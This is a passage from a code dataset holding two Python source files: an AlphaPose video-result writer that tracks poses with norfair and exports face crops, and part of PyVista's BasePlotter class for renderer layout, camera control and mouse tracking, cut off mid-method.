source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
writer.py
|
import os
import time
from threading import Thread
from queue import Queue
import cv2
import numpy as np
import torch
import torch.multiprocessing as mp
from alphapose.utils.transforms import get_func_heatmap_to_coord
from alphapose.utils.pPose_nms import pose_nms, write_json
from alphapose.utils.data_recorder import DataRecorder
from alphapose.face.face_from_keypoints import Face
import norfair
face = Face()
DEFAULT_VIDEO_SAVE_OPT = {
'savepath': 'examples/res/1.mp4',
'fourcc': cv2.VideoWriter_fourcc(*'mp4v'),
'fps': 25,
'frameSize': (640, 480)
}
EVAL_JOINTS = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16]
detection_threshold = 0.2
keypoint_dist_threshold = None
def keypoints_distance(detected_pose, tracked_pose):
distances = np.linalg.norm(detected_pose.points - tracked_pose.estimate, axis=1)
match_num = np.count_nonzero(
(distances < keypoint_dist_threshold)
* (detected_pose.scores > detection_threshold)
* (tracked_pose.last_detection.scores > detection_threshold)
)
return 1 / (1 + match_num)
class DataWriter():
def __init__(self, cfg, opt, save_video=False,
video_save_opt=DEFAULT_VIDEO_SAVE_OPT,
queueSize=1024):
self.cfg = cfg
self.opt = opt
self.video_save_opt = video_save_opt
self.eval_joints = EVAL_JOINTS
self.save_video = save_video
self.heatmap_to_coord = get_func_heatmap_to_coord(cfg)
# initialize the queue used to store frames read from
# the video file
if opt.sp:
self.result_queue = Queue(maxsize=queueSize)
else:
self.result_queue = mp.Queue(maxsize=queueSize)
if opt.save_img:
if not os.path.exists(opt.outputpath + '/vis'):
os.mkdir(opt.outputpath + '/vis')
if opt.pose_flow:
from trackers.PoseFlow.poseflow_infer import PoseFlowWrapper
self.pose_flow_wrapper = PoseFlowWrapper(save_path=os.path.join(opt.outputpath, 'poseflow'))
self.tracker = norfair.Tracker(
distance_function=keypoints_distance,
distance_threshold=0.3,
detection_threshold=0.2
)
self.data_recorder = DataRecorder()
def clear_data(self):
# self.data_recorder.clear_data()
face.clear_data()
def export_data(self, fname):
fpath = os.path.join(self.opt.outputpath, 'vis', '{}.csv'.format(fname))
print(fpath)
# self.data_recorder.export_data(os.path.join(opt.outputpath, 'vis') , '{}'.format(fname))
face.export_data(fpath)
def start_worker(self, target):
if self.opt.sp:
p = Thread(target=target, args=())
else:
p = mp.Process(target=target, args=())
# p.daemon = True
p.start()
return p
def start(self):
# start a thread to read pose estimation results per frame
self.result_worker = self.start_worker(self.update)
return self
def update(self):
# final_result = []
norm_type = self.cfg.LOSS.get('NORM_TYPE', None)
hm_size = self.cfg.DATA_PRESET.HEATMAP_SIZE
if self.save_video:
# initialize the file video stream, adapt ouput video resolution to original video
stream = cv2.VideoWriter(*[self.video_save_opt[k] for k in ['savepath', 'fourcc', 'fps', 'frameSize']])
if not stream.isOpened():
print("Try to use other video encoders...")
ext = self.video_save_opt['savepath'].split('.')[-1]
fourcc, _ext = self.recognize_video_ext(ext)
self.video_save_opt['fourcc'] = fourcc
self.video_save_opt['savepath'] = self.video_save_opt['savepath'][:-4] + _ext
stream = cv2.VideoWriter(*[self.video_save_opt[k] for k in ['savepath', 'fourcc', 'fps', 'frameSize']])
assert stream.isOpened(), 'Cannot open video for writing'
# keep looping infinitelyd
while True:
# ensure the queue is not empty and get item
(boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name) = self.wait_and_get(self.result_queue)
if orig_img is None:
# if the thread indicator variable is set (img is None), stop the thread
if self.save_video:
stream.release()
# write_json(final_result, self.opt.outputpath, form=self.opt.format, for_eval=self.opt.eval)
# print("Results have been written to json.")
return
# image channel RGB->BGR
orig_img = np.array(orig_img, dtype=np.uint8)[:, :, ::-1]
if boxes is None or len(boxes) == 0:
if self.opt.save_img or self.save_video or self.opt.vis:
self.write_image(orig_img, im_name, stream=stream if self.save_video else None)
else:
# location prediction (n, kp, 2) | score prediction (n, kp, 1)
assert hm_data.dim() == 4
#pred = hm_data.cpu().data.numpy()
if hm_data.size()[1] == 136:
self.eval_joints = [*range(0,136)]
elif hm_data.size()[1] == 26:
self.eval_joints = [*range(0,26)]
pose_coords = []
pose_scores = []
for i in range(hm_data.shape[0]):
bbox = cropped_boxes[i].tolist()
pose_coord, pose_score = self.heatmap_to_coord(hm_data[i][self.eval_joints], bbox, hm_shape=hm_size, norm_type=norm_type)
pose_coords.append(torch.from_numpy(pose_coord).unsqueeze(0))
pose_scores.append(torch.from_numpy(pose_score).unsqueeze(0))
preds_img = torch.cat(pose_coords)
preds_scores = torch.cat(pose_scores)
if not self.opt.pose_track:
boxes, scores, ids, preds_img, preds_scores, pick_ids = \
pose_nms(boxes, scores, ids, preds_img, preds_scores, self.opt.min_box_area)
_result = []
for k in range(len(scores)):
_result.append(
{
'keypoints':preds_img[k],
'kp_score':preds_scores[k],
'proposal_score': torch.mean(preds_scores[k]) + scores[k] + 1.25 * max(preds_scores[k]),
'idx':ids[k],
'box':[boxes[k][0], boxes[k][1], boxes[k][2]-boxes[k][0],boxes[k][3]-boxes[k][1]]
}
)
result = {
'imgname': im_name,
'result': _result
}
if self.opt.pose_flow:
poseflow_result = self.pose_flow_wrapper.step(orig_img, result)
for i in range(len(poseflow_result)):
result['result'][i]['idx'] = poseflow_result[i]['idx']
global keypoint_dist_threshold
keypoint_dist_threshold = orig_img.shape[0] / 30
detections = [
norfair.Detection(p['keypoints'].numpy(), scores=p['kp_score'].squeeze().numpy())
for p in result['result']
]
tracked_objects = self.tracker.update(detections=detections)
norfair.draw_tracked_objects(orig_img.copy(), tracked_objects)
# self.cropped(orig_img.copy(), tracked_objects)
face.export_face_img(tracked_objects, orig_img.copy(), os.path.join(self.opt.outputpath, 'vis'), vdo_fname='id')
# final_result.append(result)
if self.opt.save_img or self.save_video or self.opt.vis:
if hm_data.size()[1] == 49:
from alphapose.utils.vis import vis_frame_dense as vis_frame
elif self.opt.vis_fast:
from alphapose.utils.vis import vis_frame_fast as vis_frame
else:
from alphapose.utils.vis import vis_frame
img = vis_frame(orig_img, result, self.opt)
self.write_image(img, im_name, stream=stream if self.save_video else None)
def write_image(self, img, im_name, stream=None):
if self.opt.vis:
cv2.imshow("AlphaPose Demo", img)
cv2.waitKey(30)
if self.opt.save_img:
cv2.imwrite(os.path.join(self.opt.outputpath, 'vis', im_name), img)
if self.save_video:
stream.write(img)
def wait_and_put(self, queue, item):
queue.put(item)
def wait_and_get(self, queue):
return queue.get()
def save(self, boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name):
# save next frame in the queue
self.wait_and_put(self.result_queue, (boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name))
def running(self):
# indicate that the thread is still running
return not self.result_queue.empty()
def count(self):
# indicate the remaining images
return self.result_queue.qsize()
def stop(self):
# indicate that the thread should be stopped
self.save(None, None, None, None, None, None, None)
self.result_worker.join()
def terminate(self):
# directly terminate
self.result_worker.terminate()
def clear_queues(self):
self.clear(self.result_queue)
def clear(self, queue):
while not queue.empty():
queue.get()
def results(self):
# return final result
print(self.final_result)
return self.final_result
def recognize_video_ext(self, ext=''):
if ext == 'mp4':
return cv2.VideoWriter_fourcc(*'mp4v'), '.' + ext
elif ext == 'avi':
return cv2.VideoWriter_fourcc(*'XVID'), '.' + ext
elif ext == 'mov':
return cv2.VideoWriter_fourcc(*'XVID'), '.' + ext
else:
print("Unknow video format {}, will use .mp4 instead of it".format(ext))
return cv2.VideoWriter_fourcc(*'mp4v'), '.mp4'
|
plotting.py
|
"""Pyvista plotting module."""
import pathlib
import collections.abc
from functools import partial
import logging
import os
import time
import warnings
from functools import wraps
from threading import Thread
import imageio
import numpy as np
import scooby
import vtk
from vtk.util import numpy_support as VN
from vtk.util.numpy_support import numpy_to_vtk, vtk_to_numpy
import pyvista
from pyvista.utilities import (assert_empty_kwargs,
convert_array, convert_string_array, get_array,
is_pyvista_dataset, numpy_to_texture, abstract_class,
raise_not_matching, try_callback, wrap)
from .background_renderer import BackgroundRenderer
from .colors import get_cmap_safe
from .export_vtkjs import export_plotter_vtkjs
from .mapper import make_mapper
from .picking import PickingHelper
from .renderer import Renderer
from .theme import (FONT_KEYS, MAX_N_COLOR_BARS, parse_color,
parse_font_family, rcParams)
from .tools import normalize, opacity_transfer_function
from .widgets import WidgetHelper
try:
import matplotlib
has_matplotlib = True
except ImportError:
has_matplotlib = False
_ALL_PLOTTERS = {}
def close_all():
"""Close all open/active plotters and clean up memory."""
for key, p in _ALL_PLOTTERS.items():
if not p._closed:
p.close()
p.deep_clean()
_ALL_PLOTTERS.clear()
return True
log = logging.getLogger(__name__)
log.setLevel('CRITICAL')
log.addHandler(logging.StreamHandler())
@abstract_class
class BasePlotter(PickingHelper, WidgetHelper):
"""To be used by the Plotter and pyvistaqt.QtInteractor classes.
Parameters
----------
shape : list or tuple, optional
Number of sub-render windows inside of the main window.
Specify two across with ``shape=(2, 1)`` and a two by two grid
with ``shape=(2, 2)``. By default there is only one renderer.
Can also accept a string descriptor as shape. E.g.:
* ``shape="3|1"`` means 3 plots on the left and 1 on the right,
* ``shape="4/2"`` means 4 plots on top and 2 at the bottom.
border : bool, optional
Draw a border around each render window. Default False.
border_color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
* ``color='white'``
* ``color='w'``
* ``color=[1, 1, 1]``
* ``color='#FFFFFF'``
border_width : float, optional
Width of the border in pixels when enabled.
title : str, optional
Window title of the scalar bar
"""
mouse_position = None
click_position = None
def __init__(self, shape=(1, 1), border=None, border_color='k',
border_width=2.0, title=None, splitting_position=None,
groups=None, row_weights=None, col_weights=None):
"""Initialize base plotter."""
log.debug('BasePlotter init start')
self.image_transparent_background = rcParams['transparent_background']
self._store_image = False
self.mesh = None
if title is None:
title = rcParams['title']
self.title = str(title)
# by default add border for multiple plots
if border is None:
if shape != (1, 1):
border = True
else:
border = False
# add render windows
self._active_renderer_index = 0
self.renderers = []
self.groups = np.empty((0,4),dtype=int)
if isinstance(shape, str):
if '|' in shape:
n = int(shape.split('|')[0])
m = int(shape.split('|')[1])
rangen = reversed(range(n))
rangem = reversed(range(m))
else:
m = int(shape.split('/')[0])
n = int(shape.split('/')[1])
rangen = range(n)
rangem = range(m)
if splitting_position is None:
splitting_position = rcParams['multi_rendering_splitting_position']
if splitting_position is None:
if n >= m:
xsplit = m/(n+m)
else:
xsplit = 1-n/(n+m)
else:
xsplit = splitting_position
for i in rangen:
arenderer = Renderer(self, border, border_color, border_width)
if '|' in shape:
arenderer.SetViewport(0, i/n, xsplit, (i+1)/n)
else:
arenderer.SetViewport(i/n, 0, (i+1)/n, xsplit)
self.renderers.append(arenderer)
for i in rangem:
arenderer = Renderer(self, border, border_color, border_width)
if '|' in shape:
arenderer.SetViewport(xsplit, i/m, 1, (i+1)/m)
else:
arenderer.SetViewport(i/m, xsplit, (i+1)/m, 1)
self.renderers.append(arenderer)
self.shape = (n+m,)
self._render_idxs = np.arange(n+m)
else:
if not isinstance(shape, (np.ndarray, collections.abc.Sequence)):
raise TypeError('"shape" should be a list, tuple or string descriptor')
if len(shape) != 2:
raise ValueError('"shape" must have length 2.')
shape = np.asarray(shape)
if not np.issubdtype(shape.dtype, np.integer) or (shape <= 0).any():
raise ValueError('"shape" must contain only positive integers.')
# always assign shape as a tuple
self.shape = tuple(shape)
self._render_idxs = np.empty(self.shape,dtype=int)
# Check if row and col weights correspond to given shape, or initialize them to defaults (equally weighted)
# and convert to normalized offsets
if row_weights is None:
row_weights = np.ones(shape[0])
if col_weights is None:
col_weights = np.ones(shape[1])
assert(np.array(row_weights).size==shape[0])
assert(np.array(col_weights).size==shape[1])
row_off = np.cumsum(np.abs(row_weights))/np.sum(np.abs(row_weights))
row_off = 1-np.concatenate(([0],row_off))
col_off = np.cumsum(np.abs(col_weights))/np.sum(np.abs(col_weights))
col_off = np.concatenate(([0],col_off))
# Check and convert groups to internal format (Nx4 matrix where every row contains the row and col index of the top left cell
# together with the row and col index of the bottom right cell)
if groups is not None:
assert isinstance(groups, collections.abc.Sequence), '"groups" should be a list or tuple'
for group in groups:
assert isinstance(group, collections.abc.Sequence) and len(group)==2, 'each group entry should be a list or tuple of 2 elements'
rows = group[0]
if isinstance(rows,slice):
rows = np.arange(self.shape[0],dtype=int)[rows]
cols = group[1]
if isinstance(cols,slice):
cols = np.arange(self.shape[1],dtype=int)[cols]
# Get the normalized group, i.e. extract top left corner and bottom right corner from the given rows and cols
norm_group = [np.min(rows),np.min(cols),np.max(rows),np.max(cols)]
# Check for overlap with already defined groups:
for i in range(norm_group[0],norm_group[2]+1):
for j in range(norm_group[1],norm_group[3]+1):
assert self.loc_to_group((i,j)) is None, 'groups cannot overlap'
self.groups = np.concatenate((self.groups,np.array([norm_group],dtype=int)),axis=0)
# Create subplot renderers
for row in range(shape[0]):
for col in range(shape[1]):
group = self.loc_to_group((row,col))
nb_rows = None
nb_cols = None
if group is not None:
if row==self.groups[group,0] and col==self.groups[group,1]:
# Only add renderer for first location of the group
nb_rows = 1+self.groups[group,2]-self.groups[group,0]
nb_cols = 1+self.groups[group,3]-self.groups[group,1]
else:
nb_rows = 1
nb_cols = 1
if nb_rows is not None:
renderer = Renderer(self, border, border_color, border_width)
x0 = col_off[col]
y0 = row_off[row+nb_rows]
x1 = col_off[col+nb_cols]
y1 = row_off[row]
renderer.SetViewport(x0, y0, x1, y1)
self._render_idxs[row,col] = len(self.renderers)
self.renderers.append(renderer)
else:
self._render_idxs[row,col] = self._render_idxs[self.groups[group,0],self.groups[group,1]]
# each render will also have an associated background renderer
self._background_renderers = [None for _ in range(len(self.renderers))]
# create a shadow renderer that lives on top of all others
self._shadow_renderer = Renderer(
self, border, border_color, border_width)
self._shadow_renderer.SetViewport(0, 0, 1, 1)
self._shadow_renderer.SetDraw(False)
# This keeps track of scalars names already plotted and their ranges
self._scalar_bar_ranges = {}
self._scalar_bar_mappers = {}
self._scalar_bar_actors = {}
self._scalar_bar_widgets = {}
# track if the camera has been setup
# self.camera_set = False
self._first_time = True
# Keep track of the scale
self._labels = []
# Set default style
self._style = 'RubberBandPick'
self._style_class = None
# this helps managing closed plotters
self._closed = False
# Add self to open plotters
self._id_name = f"{hex(id(self))}-{len(_ALL_PLOTTERS)}"
_ALL_PLOTTERS[self._id_name] = self
# lighting style
self.disable_3_lights()
# Key bindings
self.reset_key_events()
log.debug('BasePlotter init stop')
#### Manage the active Renderer ####
def loc_to_group(self, loc):
"""Return group id of the given location index. Or None if this location is not part of any group."""
group_idxs = np.arange(self.groups.shape[0])
I = (loc[0]>=self.groups[:,0]) & (loc[0]<=self.groups[:,2]) & (loc[1]>=self.groups[:,1]) & (loc[1]<=self.groups[:,3])
group = group_idxs[I]
return None if group.size==0 else group[0]
def loc_to_index(self, loc):
"""Return index of the render window given a location index.
Parameters
----------
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``.
Return
------
idx : int
Index of the render window.
"""
if loc is None:
return self._active_renderer_index
elif isinstance(loc, (int, np.integer)):
return loc
elif isinstance(loc, (np.ndarray, collections.abc.Sequence)):
if not len(loc) == 2:
raise ValueError('"loc" must contain two items')
index_row = loc[0]
index_column = loc[1]
if index_row < 0 or index_row >= self.shape[0]:
raise IndexError(f'Row index is out of range ({self.shape[0]})')
if index_column < 0 or index_column >= self.shape[1]:
raise IndexError(f'Column index is out of range ({self.shape[1]})')
return self._render_idxs[index_row,index_column]
else:
raise TypeError('"loc" must be an integer or a sequence.')
def index_to_loc(self, index):
"""Convert a 1D index location to the 2D location on the plotting grid."""
if not isinstance(index, (int, np.integer)):
raise TypeError('"index" must be a scalar integer.')
if len(self.shape) == 1:
return index
args = np.argwhere(self._render_idxs == index)
if len(args) < 1:
raise IndexError('Index ({}) is out of range.')
return args[0]
@property
def renderer(self):
"""Return the active renderer."""
return self.renderers[self._active_renderer_index]
@property
def store_image(self):
"""Return if an image will be saved on close."""
return self._store_image
@store_image.setter
def store_image(self, value):
"""Store last rendered frame on close."""
self._store_image = bool(value)
def subplot(self, index_row, index_column=None):
"""Set the active subplot.
Parameters
----------
index_row : int
Index of the subplot to activate along the rows.
index_column : int
Index of the subplot to activate along the columns.
"""
if len(self.shape) == 1:
self._active_renderer_index = index_row
return
if index_row < 0 or index_row >= self.shape[0]:
raise IndexError(f'Row index is out of range ({self.shape[0]})')
if index_column < 0 or index_column >= self.shape[1]:
raise IndexError(f'Column index is out of range ({self.shape[1]})')
self._active_renderer_index = self.loc_to_index((index_row, index_column))
#### Wrap Renderer methods ####
@wraps(Renderer.add_floor)
def add_floor(self, *args, **kwargs):
"""Wrap ``Renderer.add_floor``."""
return self.renderer.add_floor(*args, **kwargs)
@wraps(Renderer.remove_floors)
def remove_floors(self, *args, **kwargs):
"""Wrap ``Renderer.remove_floors``."""
return self.renderer.remove_floors(*args, **kwargs)
def enable_3_lights(self):
"""Enable 3-lights illumination."""
def _to_pos(elevation, azimuth):
theta = azimuth * np.pi / 180.0
phi = (90.0 - elevation) * np.pi / 180.0
x = np.sin(theta) * np.sin(phi)
y = np.cos(phi)
z = np.cos(theta) * np.sin(phi)
return x, y, z
# Inspired from Mayavi's version of Raymond Maple 3-lights illumination
lights = list(self.renderer.GetLights())
headlight = lights.pop(0)
headlight.SetSwitch(False)
for i in range(len(lights)):
if i < 3:
lights[i].SetSwitch(True)
lights[i].SetIntensity(1.0)
lights[i].SetColor(1.0, 1.0, 1.0)
else:
lights[i].SetSwitch(False)
lights[i].SetPosition(_to_pos(0.0, 0.0))
lights[i].SetIntensity(1.0)
lights[i].SetColor(1.0, 1.0, 1.0)
lights[0].SetPosition(_to_pos(45.0, 45.0))
lights[1].SetPosition(_to_pos(-30.0, -60.0))
lights[1].SetIntensity(0.6)
lights[2].SetPosition(_to_pos(-30.0, 60.0))
lights[2].SetIntensity(0.5)
def disable_3_lights(self):
"""Disable 3-lights illumination."""
self.lighting = vtk.vtkLightKit()
# self.lighting.SetHeadLightWarmth(1.0)
# self.lighting.SetHeadLightWarmth(1.0)
for renderer in self.renderers:
renderer.RemoveAllLights()
self.lighting.AddLightsToRenderer(renderer)
renderer.LightFollowCameraOn()
@wraps(Renderer.enable_anti_aliasing)
def enable_anti_aliasing(self, *args, **kwargs):
"""Wrap ``Renderer.enable_anti_aliasing``."""
self.renderer.enable_anti_aliasing(*args, **kwargs)
@wraps(Renderer.disable_anti_aliasing)
def disable_anti_aliasing(self, *args, **kwargs):
"""Wrap ``Renderer.disable_anti_aliasing``."""
self.renderer.disable_anti_aliasing(*args, **kwargs)
@wraps(Renderer.set_focus)
def set_focus(self, *args, **kwargs):
"""Wrap ``Renderer.set_focus``."""
self.renderer.set_focus(*args, **kwargs)
self.render()
@wraps(Renderer.set_position)
def set_position(self, *args, **kwargs):
"""Wrap ``Renderer.set_position``."""
self.renderer.set_position(*args, **kwargs)
self.render()
@wraps(Renderer.set_viewup)
def set_viewup(self, *args, **kwargs):
"""Wrap ``Renderer.set_viewup``."""
self.renderer.set_viewup(*args, **kwargs)
self.render()
@wraps(Renderer.add_orientation_widget)
def add_orientation_widget(self, *args, **kwargs):
"""Wrap ``Renderer.add_orientation_widget``."""
return self.renderer.add_orientation_widget(*args, **kwargs)
@wraps(Renderer.add_axes)
def add_axes(self, *args, **kwargs):
"""Wrap ``Renderer.add_axes``."""
return self.renderer.add_axes(*args, **kwargs)
@wraps(Renderer.hide_axes)
def hide_axes(self, *args, **kwargs):
"""Wrap ``Renderer.hide_axes``."""
return self.renderer.hide_axes(*args, **kwargs)
@wraps(Renderer.show_axes)
def show_axes(self, *args, **kwargs):
"""Wrap ``Renderer.show_axes``."""
return self.renderer.show_axes(*args, **kwargs)
@wraps(Renderer.update_bounds_axes)
def update_bounds_axes(self, *args, **kwargs):
"""Wrap ``Renderer.update_bounds_axes``."""
return self.renderer.update_bounds_axes(*args, **kwargs)
@wraps(Renderer.add_actor)
def add_actor(self, *args, **kwargs):
"""Wrap ``Renderer.add_actor``."""
return self.renderer.add_actor(*args, **kwargs)
@wraps(Renderer.enable_parallel_projection)
def enable_parallel_projection(self, *args, **kwargs):
"""Wrap ``Renderer.enable_parallel_projection``."""
return self.renderer.enable_parallel_projection(*args, **kwargs)
@wraps(Renderer.disable_parallel_projection)
def disable_parallel_projection(self, *args, **kwargs):
"""Wrap ``Renderer.disable_parallel_projection``."""
return self.renderer.disable_parallel_projection(*args, **kwargs)
@wraps(Renderer.add_axes_at_origin)
def add_axes_at_origin(self, *args, **kwargs):
"""Wrap ``Renderer.add_axes_at_origin``."""
return self.renderer.add_axes_at_origin(*args, **kwargs)
@wraps(Renderer.show_bounds)
def show_bounds(self, *args, **kwargs):
"""Wrap ``Renderer.show_bounds``."""
return self.renderer.show_bounds(*args, **kwargs)
@wraps(Renderer.add_bounds_axes)
def add_bounds_axes(self, *args, **kwargs):
"""Wrap ``add_bounds_axes``."""
return self.renderer.add_bounds_axes(*args, **kwargs)
@wraps(Renderer.add_bounding_box)
def add_bounding_box(self, *args, **kwargs):
"""Wrap ``Renderer.add_bounding_box``."""
return self.renderer.add_bounding_box(*args, **kwargs)
@wraps(Renderer.remove_bounding_box)
def remove_bounding_box(self, *args, **kwargs):
"""Wrap ``Renderer.remove_bounding_box``."""
return self.renderer.remove_bounding_box(*args, **kwargs)
@wraps(Renderer.remove_bounds_axes)
def remove_bounds_axes(self, *args, **kwargs):
"""Wrap ``Renderer.remove_bounds_axes``."""
return self.renderer.remove_bounds_axes(*args, **kwargs)
@wraps(Renderer.show_grid)
def show_grid(self, *args, **kwargs):
"""Wrap ``Renderer.show_grid``."""
return self.renderer.show_grid(*args, **kwargs)
@wraps(Renderer.set_scale)
def set_scale(self, *args, **kwargs):
"""Wrap ``Renderer.set_scale``."""
return self.renderer.set_scale(*args, **kwargs)
@wraps(Renderer.enable_eye_dome_lighting)
def enable_eye_dome_lighting(self, *args, **kwargs):
"""Wrap ``Renderer.enable_eye_dome_lighting``."""
return self.renderer.enable_eye_dome_lighting(*args, **kwargs)
@wraps(Renderer.disable_eye_dome_lighting)
def disable_eye_dome_lighting(self, *args, **kwargs):
"""Wrap ``Renderer.disable_eye_dome_lighting``."""
return self.renderer.disable_eye_dome_lighting(*args, **kwargs)
@wraps(Renderer.reset_camera)
def reset_camera(self, *args, **kwargs):
"""Wrap ``Renderer.reset_camera``."""
self.renderer.reset_camera(*args, **kwargs)
self.render()
@wraps(Renderer.isometric_view)
def isometric_view(self, *args, **kwargs):
"""Wrap ``Renderer.isometric_view``."""
return self.renderer.isometric_view(*args, **kwargs)
@wraps(Renderer.view_isometric)
def view_isometric(self, *args, **kwarg):
"""Wrap ``Renderer.view_isometric``."""
return self.renderer.view_isometric(*args, **kwarg)
@wraps(Renderer.view_vector)
def view_vector(self, *args, **kwarg):
"""Wrap ``Renderer.view_vector``."""
return self.renderer.view_vector(*args, **kwarg)
@wraps(Renderer.view_xy)
def view_xy(self, *args, **kwarg):
"""Wrap ``Renderer.view_xy``."""
return self.renderer.view_xy(*args, **kwarg)
@wraps(Renderer.view_yx)
def view_yx(self, *args, **kwarg):
"""Wrap ``Renderer.view_yx``."""
return self.renderer.view_yx(*args, **kwarg)
@wraps(Renderer.view_xz)
def view_xz(self, *args, **kwarg):
"""Wrap ``Renderer.view_xz``."""
return self.renderer.view_xz(*args, **kwarg)
@wraps(Renderer.view_zx)
def view_zx(self, *args, **kwarg):
"""Wrap ``Renderer.view_zx``."""
return self.renderer.view_zx(*args, **kwarg)
@wraps(Renderer.view_yz)
def view_yz(self, *args, **kwarg):
"""Wrap ``Renderer.view_yz``."""
return self.renderer.view_yz(*args, **kwarg)
@wraps(Renderer.view_zy)
def view_zy(self, *args, **kwarg):
"""Wrap ``Renderer.view_zy``."""
return self.renderer.view_zy(*args, **kwarg)
@wraps(Renderer.disable)
def disable(self, *args, **kwarg):
"""Wrap ``Renderer.disable``."""
return self.renderer.disable(*args, **kwarg)
@wraps(Renderer.enable)
def enable(self, *args, **kwarg):
"""Wrap ``Renderer.enable``."""
return self.renderer.enable(*args, **kwarg)
@wraps(Renderer.enable_depth_peeling)
def enable_depth_peeling(self, *args, **kwargs):
"""Wrap ``Renderer.enable_depth_peeling``."""
if hasattr(self, 'ren_win'):
result = self.renderer.enable_depth_peeling(*args, **kwargs)
if result:
self.ren_win.AlphaBitPlanesOn()
return result
@wraps(Renderer.disable_depth_peeling)
def disable_depth_peeling(self):
"""Wrap ``Renderer.disable_depth_peeling``."""
if hasattr(self, 'ren_win'):
self.ren_win.AlphaBitPlanesOff()
return self.renderer.disable_depth_peeling()
@wraps(Renderer.get_default_cam_pos)
def get_default_cam_pos(self, *args, **kwargs):
"""Wrap ``Renderer.get_default_cam_pos``."""
return self.renderer.get_default_cam_pos(*args, **kwargs)
@wraps(Renderer.remove_actor)
def remove_actor(self, actor, reset_camera=False):
"""Wrap ``Renderer.remove_actor``."""
for renderer in self.renderers:
renderer.remove_actor(actor, reset_camera)
return True
#### Properties from Renderer ####
@property
def camera(self):
"""Return the active camera of the active renderer."""
return self.renderer.camera
@camera.setter
def camera(self, camera):
"""Set the active camera for the rendering scene."""
self.renderer.camera = camera
@property
def camera_set(self):
"""Return if the camera of the active renderer has been set."""
return self.renderer.camera_set
@camera_set.setter
def camera_set(self, is_set):
"""Set if the camera has been set on the active renderer."""
self.renderer.camera_set = is_set
@property
def bounds(self):
"""Return the bounds of the active renderer."""
return self.renderer.bounds
@property
def length(self):
"""Return the length of the diagonal of the bounding box of the scene."""
return self.renderer.length
@property
def center(self):
"""Return the center of the active renderer."""
return self.renderer.center
@property
def _scalar_bar_slots(self):
"""Return the scalar bar slots of the active renderer."""
return self.renderer._scalar_bar_slots
@property
def _scalar_bar_slot_lookup(self):
"""Return the scalar bar slot lookup of the active renderer."""
return self.renderer._scalar_bar_slot_lookup
@_scalar_bar_slots.setter
def _scalar_bar_slots(self, value):
"""Set the scalar bar slots of the active renderer."""
self.renderer._scalar_bar_slots = value
@_scalar_bar_slot_lookup.setter
def _scalar_bar_slot_lookup(self, value):
"""Set the scalar bar slot lookup of the active renderer."""
self.renderer._scalar_bar_slot_lookup = value
@property
def scale(self):
"""Return the scaling of the active renderer."""
return self.renderer.scale
@scale.setter
def scale(self, scale):
"""Set the scaling of the active renderer."""
self.renderer.set_scale(*scale)
@property
def camera_position(self):
"""Return camera position of the active render window."""
return self.renderer.camera_position
@camera_position.setter
def camera_position(self, camera_location):
"""Set camera position of the active render window."""
self.renderer.camera_position = camera_location
@property
def background_color(self):
"""Return the background color of the first render window."""
return self.renderers[0].GetBackground()
@background_color.setter
def background_color(self, color):
"""Set the background color of all the render windows."""
self.set_background(color)
#### Properties of the BasePlotter ####
@property
def window_size(self):
"""Return the render window size."""
return list(self.ren_win.GetSize())
@window_size.setter
def window_size(self, window_size):
"""Set the render window size."""
self.ren_win.SetSize(window_size[0], window_size[1])
@property
def image_depth(self):
"""Return a depth image representing current render window.
Helper attribute for ``get_image_depth``.
"""
return self.get_image_depth()
@property
def image(self):
"""Return an image array of current render window.
To retrieve an image after the render window has been closed,
set: `plotter.store_image = True`
"""
if not hasattr(self, 'ren_win') and hasattr(self, 'last_image'):
return self.last_image
ifilter = vtk.vtkWindowToImageFilter()
ifilter.SetInput(self.ren_win)
ifilter.ReadFrontBufferOff()
if self.image_transparent_background:
ifilter.SetInputBufferTypeToRGBA()
else:
ifilter.SetInputBufferTypeToRGB()
return self._run_image_filter(ifilter)
#### Everything else ####
def render(self):
"""Render the main window.
If this is called before ``show()``, nothing will happen.
"""
if hasattr(self, 'ren_win') and not self._first_time:
self.ren_win.Render()
# Not sure if this is ever needed but here as a reminder
# if hasattr(self, 'iren') and not self._first_time:
# self.iren.Render()
return
def add_key_event(self, key, callback):
"""Add a function to callback when the given key is pressed.
These are non-unique - thus a key could map to many callback
functions. The callback function must not have any arguments.
Parameters
----------
key : str
The key to trigger the event
callback : callable
A callable that takes no arguments
"""
if not hasattr(callback, '__call__'):
raise TypeError('callback must be callable.')
self._key_press_event_callbacks[key].append(callback)
def _add_observer(self, event, call):
if hasattr(self, 'iren'):
call = partial(try_callback, call)
self._observers[event] = self.iren.AddObserver(event, call)
def _remove_observer(self, event):
if hasattr(self, 'iren') and event in self._observers:
self.iren.RemoveObserver(event)
del self._observers[event]
def clear_events_for_key(self, key):
"""Remove the callbacks associated to the key."""
self._key_press_event_callbacks.pop(key)
def store_mouse_position(self, *args):
"""Store mouse position."""
if not hasattr(self, "iren"):
raise AttributeError("This plotting window is not interactive.")
self.mouse_position = self.iren.GetEventPosition()
def store_click_position(self, *args):
"""Store click position in viewport coordinates."""
if not hasattr(self, "iren"):
raise AttributeError("This plotting window is not interactive.")
self.click_position = self.iren.GetEventPosition()
self.mouse_position = self.click_position
def track_mouse_position(self):
"""Keep track of the mouse position.
This will potentially slow down the interactor. No callbacks supported
here - use :func:`pyvista.BasePlotter.track_click_position` instead.
"""
if hasattr(self, "iren"):
self._add_observer(vtk.vtkCommand.MouseMoveEvent,
self.store_mouse_position)
def untrack_mouse_position(self):
"""Stop tracking the mouse position."""
self._remove_observer(vtk.vtkCommand.MouseMoveEvent)
def track_click_position(self, callback=None, side="right",
viewport=False):
"""Keep track of the click position.
By default, it only tracks right clicks.
Parameters
----------
callback : callable
A callable method that will use the click position. Passes the
click position as a length two tuple.
side : str
The side of the mouse for the button to track (left or right).
Default is left. Also accepts ``'r'`` or ``'l'``.
viewport: bool
If ``True``, uses the normalized viewport coordinate system
(values between 0.0 and 1.0 and support for HiDPI) when passing the
click position to the callback
"""
if not hasattr(self, "iren"):
return
side = str(side).lower()
if side in ["right", "r"]:
event = vtk.vtkCommand.RightButtonPressEvent
elif side in ["left", "l"]:
event = vtk.vtkCommand.LeftButtonPressEvent
else:
